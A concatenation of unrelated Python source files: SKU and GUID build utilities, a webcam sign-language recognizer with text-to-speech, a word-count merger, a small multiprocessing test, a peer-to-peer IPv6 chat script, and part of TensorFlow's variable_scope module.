ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (each, " | ".join(SkuIds.keys())))
if self.SkuUsageType != SkuClass.SINGLE:
self.AvailableSkuIds.update({'DEFAULT':0, 'COMMON':0})
if self.SkuIdSet:
GlobalData.gSkuids = (self.SkuIdSet)
if 'COMMON' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('COMMON')
if self.SkuUsageType == self.SINGLE:
if len(GlobalData.gSkuids) != 1:
if 'DEFAULT' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('DEFAULT')
if GlobalData.gSkuids:
GlobalData.gSkuids.sort()
def GetNextSkuId(self, skuname):
if not self._SkuInherit:
self._SkuInherit = {}
for item in self.SkuData.values():
self._SkuInherit[item[1]]=item[2] if item[2] else "DEFAULT"
return self._SkuInherit.get(skuname, "DEFAULT")
def GetSkuChain(self, sku):
if sku == "DEFAULT":
return ["DEFAULT"]
skulist = [sku]
nextsku = sku
while True:
nextsku = self.GetNextSkuId(nextsku)
skulist.append(nextsku)
if nextsku == "DEFAULT":
break
skulist.reverse()
return skulist
def SkuOverrideOrder(self):
skuorderset = []
for skuname in self.SkuIdSet:
skuorderset.append(self.GetSkuChain(skuname))
skuorder = []
for index in range(max(len(item) for item in skuorderset)):
for subset in skuorderset:
if index > len(subset)-1:
continue
if subset[index] in skuorder:
continue
skuorder.append(subset[index])
return skuorder
@property
def SkuUsageType(self):
if self._SkuIdentifier.upper() == "ALL":
return SkuClass.MULTIPLE
if len(self.SkuIdSet) == 1:
if self.SkuIdSet[0] == 'DEFAULT':
return SkuClass.DEFAULT
return SkuClass.SINGLE
if len(self.SkuIdSet) == 2 and 'DEFAULT' in self.SkuIdSet:
return SkuClass.SINGLE
return SkuClass.MULTIPLE
def DumpSkuIdArrary(self):
if self.SkuUsageType == SkuClass.SINGLE:
return "{0x0}"
ArrayStrList = []
for skuname in self.AvailableSkuIds:
if skuname == "COMMON":
continue
while skuname != "DEFAULT":
ArrayStrList.append(hex(int(self.AvailableSkuIds[skuname])))
skuname = self.GetNextSkuId(skuname)
ArrayStrList.append("0x0")
return "{{{myList}}}".format(myList=",".join(ArrayStrList))
@property
def AvailableSkuIdSet(self):
return self.AvailableSkuIds
@property
def SystemSkuId(self):
if self.SkuUsageType == SkuClass.SINGLE:
if len(self.SkuIdSet) == 1:
return self.SkuIdSet[0]
else:
return self.SkuIdSet[0] if self.SkuIdSet[0] != 'DEFAULT' else self.SkuIdSet[1]
else:
return 'DEFAULT'
## Get the integer value from string like "14U" or integer like 2
#
# @param Input The object that may be either a integer value or a string
#
# @retval Value The integer value that the input represents
#
def GetIntegerValue(Input):
if not isinstance(Input, str):
return Input
String = Input
if String.endswith("U"):
String = String[:-1]
if String.endswith("ULL"):
String = String[:-3]
if String.endswith("LL"):
String = String[:-2]
if String.startswith("0x") or String.startswith("0X"):
return int(String, 16)
elif String == '':
return 0
else:
return int(String)
#
# Pack a GUID (registry format) list into a buffer and return it
#
def PackGUID(Guid):
return pack(PACK_PATTERN_GUID,
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16)
)
#
# Pack a GUID (byte) list into a buffer and return it
#
def PackByteFormatGUID(Guid):
return pack(PACK_PATTERN_GUID,
Guid[0],
Guid[1],
Guid[2],
Guid[3],
Guid[4],
Guid[5],
Guid[6],
Guid[7],
Guid[8],
Guid[9],
Guid[10],
)
## DeepCopy dict/OrderedDict recusively
#
# @param ori_dict a nested dict or ordereddict
#
# @retval new dict or orderdict
#
def CopyDict(ori_dict):
dict_type = ori_dict.__class__
if dict_type not in (dict,OrderedDict):
return ori_dict
new_dict = dict_type()
for key in ori_dict:
if isinstance(ori_dict[key],(dict,OrderedDict)):
new_dict[key] = CopyDict(ori_dict[key])
else:
new_dict[key] = ori_dict[key]
return new_dict
#
# Remove the c/c++ comments: // and /* */
#
def RemoveCComments(ctext):
return re.sub('//.*?\n|/\*.*?\*/', '\n', ctext, flags=re.S)
|
fun_util.py
|
import cv2, pickle
import numpy as np
import tensorflow as tf
from cnn_tf import cnn_model_fn
import os
import sqlite3
from keras.models import load_model
import constants
from PIL import Image, ImageTk
from threading import Thread
import util
import time
import pyttsx3
speaking = True
vstream = raw = None
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
model = load_model('signlang/cnn_model_keras2.h5')
if constants.DEBUG:
file = open("dump.txt", "w")
else:
create = False
count = 1
while not create:
try:
name = "lexaid (" + str(count) + ").txt"
file = open(name, "x")
create = True
file.close()
file = open(name, "w")
except FileExistsError as fee:
count += 1
engine = None
if constants.DEBUG:
engine = pyttsx3.init()
engine.setProperty("rate", 150)
def ttsdirect(s):
global engine
while engine._inLoop:
pass
engine.say(s)
engine.runAndWait()
def get_image_size():
img = cv2.imread('signlang/gestures/0/100.jpg', 0)
return img.shape
image_x, image_y = get_image_size()
def write_word(text):
print("Wrote:", text)
try:
file.write(text)
file.flush()
os.fsync(file.fileno())
except Exception:
pass
def keras_process_image(img):
img = cv2.resize(img, (image_x, image_y))
img = np.array(img, dtype = np.float32)
img = np.reshape(img, (1, image_x, image_y, 1))
return img
def keras_predict(model, image):
processed = keras_process_image(image)
pred_probab = model.predict(processed)[0]
pred_class = list(pred_probab).index(max(pred_probab))
return max(pred_probab), pred_class
def get_pred_text_from_db(pred_class):
conn = sqlite3.connect("signlang/gesture_db.db")
cmd = "SELECT g_name FROM gesture WHERE g_id=" + str(pred_class)
cursor = conn.execute(cmd)
for row in cursor:
return row[0]
def get_hand_hist():
with open("hist", "rb")as f:
hist = pickle.load(f)
return hist
came = None
x, y, w, h = 300, 100, 300, 300
hist = None
text = word = ""
count_frame = 0
def recognize():
global cam, hist
if not constants.PI:
cam = cv2.VideoCapture(constants.camera_driver)
else:
util.openCamera(True)
hist = get_hand_hist()
constants.pressedKey = None
constants.streamState = True
constants.calibrated = True
render()
def render():
global cam, hist, text, word, count_frame
if constants.PI:
img = util.getStreamFrame()
if img is None:
return
else:
img = cam.read()[1]
img = cv2.flip(img, 1)
imgCrop = img[y:y + h, x:x + w]
imgHSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
dst = cv2.calcBackProject([imgHSV], [0, 1], hist, [0, 180, 0, 256], 1)
disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10, 10))
cv2.filter2D(dst, -1, disc, dst)
blur = cv2.GaussianBlur(dst, (11, 11), 0)
blur = cv2.medianBlur(blur, 15)
thresh = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]
thresh = cv2.merge((thresh, thresh, thresh))
thresh = cv2.cvtColor(thresh, cv2.COLOR_BGR2GRAY)
fullthresh = thresh
thresh = thresh[y:y + h, x:x + w]
contours = cv2.findContours(thresh.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)[1]
old_text = text
if len(contours) > 0:
contour = max(contours, key = cv2.contourArea)
#print(cv2.contourArea(contour))
if cv2.contourArea(contour) > 10000:
x1, y1, w1, h1 = cv2.boundingRect(contour)
save_img = thresh[y1:y1 + h1, x1:x1 + w1]
if w1 > h1:
save_img = cv2.copyMakeBorder(save_img, int((w1 - h1)/2), int((w1 - h1)/2), 0, 0, cv2.BORDER_CONSTANT, (0, 0, 0))
elif h1 > w1:
save_img = cv2.copyMakeBorder(save_img, 0, 0, int((h1 - w1)/2), int((h1 - w1)/2), cv2.BORDER_CONSTANT, (0, 0, 0))
pred_probab, pred_class = keras_predict(model, save_img)
print(pred_class, pred_probab)
if pred_probab * 100 > 70:
text = get_pred_text_from_db(pred_class)
if old_text == text:
count_frame += 1
else:
count_frame = 0
if count_frame == 20:
Thread(target=ttsdirect, args=(text,)).start()
word = word + text
elif cv2.contourArea(contour) < 1000:
word = word.strip()
if len(word) > 0:
print(word)
write_word(word + " ")
Thread(target=ttsdirect, args=(word,)).start()
text = ""
word = ""
else:
word = word.strip()
if len(word) > 0:
print(word)
write_word(word + " ")
Thread(target=ttsdirect, args=(word,)).start()
text = ""
word = ""
blackboard = np.zeros((200, 640, 3), dtype = np.uint8)
blackboard[0:3, 0:] = (0, 255, 255)
#splitted_text = split_sentence(text, 2)
#put_splitted_text_in_blackboard(blackboard, splitted_text)
cv2.putText(blackboard, text, (30, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255, 255, 255))
cv2.putText(blackboard, word, (30, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
fullthresh = cv2.cvtColor(fullthresh, cv2.COLOR_GRAY2RGB)
cv2.rectangle(img, (x,y), (x+w, y+h), (0,255,0), 2)
cv2.rectangle(fullthresh, (x,y), (x+w, y+h), (0,255,0), 2)
res = None
if constants.streamState:
res = img
else:
res = fullthresh
pic = np.vstack((res, blackboard))
timg = Image.fromarray(pic).resize(constants.stream_dimens, Image.ANTIALIAS)
timgtk = ImageTk.PhotoImage(image = timg)
constants.lblUtilStream.imgtk = timgtk
constants.lblUtilStream.configure(image = timgtk)
if constants.pressedKey == "s":
print(word)
if not constants.PI:
cam.release()
else:
util.closeCamera()
cv2.destroyAllWindows()
file.close()
constants.pressedKey = None
else:
constants.lblUtilStream.after(10, render)
|
makedecadescounts.py
|
import argparse
import numpy as np
from multiprocessing import Process, Queue
import collections
from Queue import Empty
from ioutils import mkdir, write_pickle, load_pickle
def worker(proc_num, queue, out_dir, in_dir):
while True:
try:
decade = queue.get(block=False)
except Empty:
break
print "Processing decade", decade
for year in range(10):
year_counts = load_pickle(in_dir + str(decade + year) + "-counts.pkl")
if year == 0:
merged_year_counts = year_counts
for word, count in year_counts.iteritems():
if not word in merged_year_counts:
merged_year_counts[word] = 0
merged_year_counts[word] += year_counts[word]
write_pickle(merged_year_counts, out_dir + str(decade) + "-counts.pkl")
def run_parallel(num_procs, out_dir, in_dir, decades):
queue = Queue()
for decade in decades:
queue.put(decade)
procs = [Process(target=worker, args=[i, queue, out_dir, in_dir]) for i in range(num_procs)]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Merge counts for 1gram data.")
parser.add_argument("base_dir", help="base directoty. /counts should be a subdir")
parser.add_argument("num_procs", type=int, help="number of processes to spawn")
parser.add_argument("--start-year", type=int, help="start year (inclusive)")
parser.add_argument("--end-year", type=int, help="end year (inclusive)")
args = parser.parse_args()
decades = range(args.start_year, args.end_year+1, 10)
decades.reverse()
out_dir = args.base_dir + "/decades/counts/"
mkdir(out_dir)
run_parallel(args.num_procs, out_dir, args.base_dir + "/counts/", decades)
|
test_multiprocessing.py
|
from declarativeunittest import *
from construct import *
from construct.lib import *
def worker(q):
obj = q.get()
print(obj)
def test_multiprocessing():
import multiprocessing
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=worker, args=(queue,))
p.start()
obj = Container(name="test")
print(obj)
queue.put(obj)
# Wait for the worker to finish
queue.close()
queue.join_thread()
p.join()
|
seeder.py
|
from Node import Seeder
import socket as s
import threading as th
import json
import time
import sys
from tkinter import *
import encrypt as e
import getipv6
enc=e.MYcrypt()
alias=sys.argv[1]
S=s.socket(s.AF_INET6,s.SOCK_DGRAM)
HOST=getipv6.HOST
S.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR,1)
S.bind((HOST,6969))
print("Share this link\n"+enc.encrypt(HOST,0,sep='m'))
print("*"*50+"\n"+"*"*50+"\n"+"\t\tTHIS CHAT IS POWERED BY BAZOOKA\n"+"*"*50+"\n"+"*"*50+"\n")
print("MADE BY khallnayak\n\n\n")
peer_threads={}
inp_data=""
def send_data(text):
obj.inp_data=text.get("1.0",END)[:-1]
text.delete("1.0",END)
def gui():
root=Tk()
root.geometry("300x50+0+0")
root.protocol("WM_DELETE_WINDOW",sys.exit)
root.title("PRESS Ctrl TO SEND")
text=Text(root,wrap=WORD,font=("Verdana",10))
text.pack()
text.bind("<Control_L>",func=lambda x: send_data(text))
root.mainloop()
new_thread=th.Thread(target=gui,)
new_thread.start()
"""
INIT FILE NAME AND GENERATE BLOCKS WITH LEDGER
ASK FOR TIER SIZE
"""
class Msg():
def __init__(self):
self.inp_data=""
obj=Msg()
seeder=Seeder(3)
def refresh(soc,chain,addr):
try:
soc.sendto(json.dumps(chain).encode(),addr)
return True
except OSError as e:
return False
def seed(soc,addr):
#print("In seed")
msg="NanDeMoNay".encode()
flag,number=seeder.allocate_number()
soc.sendto(json.dumps(number).encode(),addr)
#print(soc)
if(type(number)==int):
answer,ans_addr=soc.recvfrom(40)
#print(answer,ans_addr)
if(answer):
seeder.init_connection(addr)
soc.sendto(json.dumps(seeder.size).encode(),ans_addr)
flag=refresh(soc,seeder.get_chain(),ans_addr)
other_alias,_=soc.recvfrom(1024)
other_alias=other_alias.decode()
soc.sendto(str(alias).encode(),ans_addr)
"""
SEND LEDGER SHIT
"""
if(not flag):
#Something error
print("FLAG ERROR",flag)
else:
soc.close()
print("NO ANSWER FROM PEER")
sys.exit()
time1=time.time()
while True:
try:
if(time.time()-time1>=5):
soc.sendto("CHAIN".encode(),ans_addr)
chain,_=soc.recvfrom(2048)
chain=chain.decode()
#print(chain,"\t FROM PEER",number)
seeder.update_chain(chain,number)
refresh(soc,seeder.get_chain(),ans_addr)
#print("CHAIN UPDATE")
time1=time.time()
else:
"""
1. SELECT BLOCK NUMBER AND SEND BLOCK
2. BLOCK CHECKING ON PEER SIDE
"""
if(obj.inp_data!=""):
print("[SELF] "+obj.inp_data)
soc.sendto(obj.inp_data.encode(),ans_addr)
obj.inp_data=""
else:
pass
soc.sendto(msg,ans_addr)
data,addr=soc.recvfrom(1024)
if(data!=b"NanDeMoNay"):
print("[{0}] ".format(other_alias)+data.decode())
#time.sleep(0.2)
except OSError as e:
print(e)
while True:
thread=[]
sockets=[]
try:
data,addr=S.recvfrom(1024)
print(data,addr,"IN MAIN",sep="\t")
if(addr not in peer_threads.keys()):
sockets.append(s.socket(s.AF_INET6,s.SOCK_DGRAM))
sockets[-1].setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR,1)
thread.append(th.Thread(target=seed,args=(sockets[-1],addr,)))
thread[-1].start()
except KeyboardInterrupt as e:
break
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Set trainable value based on synchronization value.
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
